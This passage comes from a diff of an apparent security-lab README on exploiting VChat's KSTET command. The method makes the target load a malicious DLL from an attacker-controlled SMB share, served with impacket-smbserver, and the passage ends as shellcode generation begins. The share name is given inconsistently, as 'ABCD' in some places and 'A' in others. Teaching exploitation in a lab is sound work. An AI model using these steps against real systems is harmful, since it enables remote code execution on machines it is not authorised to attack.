xinwenfu/VChat_KSTET_DLL/README.md

 * `-f`: The output format.
     * `dll`: Format for use as a DLL.

 Now we know from the [UNC](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/62e862f4-2a51-452e-8eeb-dc4ff5ee33cc) datatype that we have to provide a string in the form `= "\\" host-name "\" share-name  [ "\" object-name ]` when attempting to load and attach a DLL to our process.
-In our case, this could be something like `\\10.0.2.15\A\mal.dll` where `10.0.2.15` is the IP of the Kali, `ABCD` is the name of our SMB share and `mal.dll` is the malicious DLL object we are sharing.
+In our case, this could be something like `\\10.0.2.15\ABCD\mal.dll` where `10.0.2.15` is the IP of the Kali, `A` is the name of our SMB share and `mal.dll` is the malicious DLL object we are sharing.
 We can generate an SMB share using the following command: This should be run in the directory that contains the malicious DLL `mal.dll`.
 ```
 $ sudo impacket-smbserver -smb2support ABCD .
 ```
 * `sudo`: This command and operation require root privileges to bind to the well-known SMB port 445.
 * [`impacket-smbserver`](https://www.kali.org/tools/impacket-scripts/#impacket-smbserver):  This is the command the launches a SMB server and add a share as specified.
 * `smb2support`: Enable SMB2 Support.
 * `A`: Name of the current Share.
 This is chosen to be short as we would complicate the shellcode generation otherwise.
 * `.`: This is the current directory we are in, we can specify a path to share a specific directory.

 	https://github.com/DaintyJet/VChat_KSTET_DLL/assets/60448620/ee57745f-bddc-4f6f-8788-372524798848

 #### Shellcode Generation
 We will as has been stated many times previously be using the `LoadLibraryA` function,requires which has the following function signature:
 ```
 HMODULE LoadLibraryA(
   [in] LPCSTR lpLibFileName